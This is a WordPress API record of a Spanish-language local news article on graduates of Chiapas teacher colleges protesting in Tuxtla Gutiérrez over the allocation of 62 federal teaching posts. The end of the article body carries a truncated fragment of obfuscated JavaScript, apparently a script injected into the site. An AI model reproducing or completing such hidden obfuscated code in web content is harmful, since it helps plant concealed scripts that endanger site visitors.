{"id":22249,"date":"2025-06-04T05:50:03","date_gmt":"2025-06-04T05:50:03","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=22249"},"modified":"2025-06-04T05:50:04","modified_gmt":"2025-06-04T05:50:04","slug":"normalistas-toman-la-sef-en-tuxtla-piden-plazas-y-respeto-a-sus-derechos","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=22249","title":{"rendered":"Normalistas toman la SEF en Tuxtla piden plazas y respeto a sus derechos"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"506\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000151010-1024x506.jpg\" alt=\"\" class=\"wp-image-22250\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000151010-1024x506.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000151010-300x148.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000151010-768x380.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000151010.jpg 1119w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>3 de junio del 2025. Tuxtla Guti\u00e9rrez.- Egresados de diferentes normales del estado realizaron una protesta en las instalaciones de la Subsecretar\u00eda de Educaci\u00f3n Federalizada en la capital chiapaneca, para pedir la liberaci\u00f3n de plazas y que sus derechos sean respetados.<\/p>\n\n\n\n<p>Exigieron se cumpla con transparencia el otorgamiento de 62 plazas federales correspondientes al ciclo 2024-2025.<\/p>\n\n\n\n<p>Relataron que realizaron un proceso de evaluaci\u00f3n \u201cestudiamos una carrera universitaria gastamos en cursos extracurriculares para obtener un lugar un lugar en la cual ahorita no se nos quiere respetar se nos dio informaci\u00f3n y una circular de que hay 62 plazas federales a nivel primaria y en otros niveles educativos como el de preescolar secundaria y en otros niveles este o en otras asignaturas nuestras demandas pues son claras no queremos que se nos atropella nuestro derecho de obtener una plaza\u201d, expres\u00f3 el vocero del grupo.<\/p>\n\n\n\n<p>\u201cVarios de nuestros compa\u00f1eros han presentado el examen para obtener una plaza en diferentes a\u00f1os, sin embargo, no les han sido otogados esos espacios a\u00fan cuando saben que permanecen vacantes.<\/p>\n\n\n\n<p>\u201cNosotros venimos de manera pac\u00edfica a que se nos aclare el \u00bfpor qu\u00e9 no se han liberado esas plazas? Cosicam que es el organismo, la coordinadora para que asigne esas plazas no le han reportado esas plazas desde hace varios eventos solo liberaron plazas estatales entonces lo que nosotros queremos es transparencia en eso porque las fechas est\u00e1n corriendo\u201d, cuestion\u00f3.<\/p>\n\n\n\n<p>El grupo remarc\u00f3 que lo \u00fanico que pide es transparencia en la asignaci\u00f3n de las plazas federales y que no quieren que atropellen sus derechos.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 3 de junio del 2025. Tuxtla Guti\u00e9rrez.- Egresados de diferentes normales del estado realizaron una protesta en las instalaciones de la Subsecretar\u00eda de Educaci\u00f3n Federalizada en la capital chiapaneca, para pedir la liberaci\u00f3n de plazas y que sus derechos sean respetados. Exigieron se cumpla con transparencia el otorgamiento de 62 plazas federales correspondientes &hellip;<\/p>\n","protected":false},"author":2,"featured_media":22250,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-22249","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22249","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=22249"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22249\/revisions"}],"predecessor-version":[{"id":22251,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22249\/revisions\/22251"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/22250"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=22249"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=22249"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=22249"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}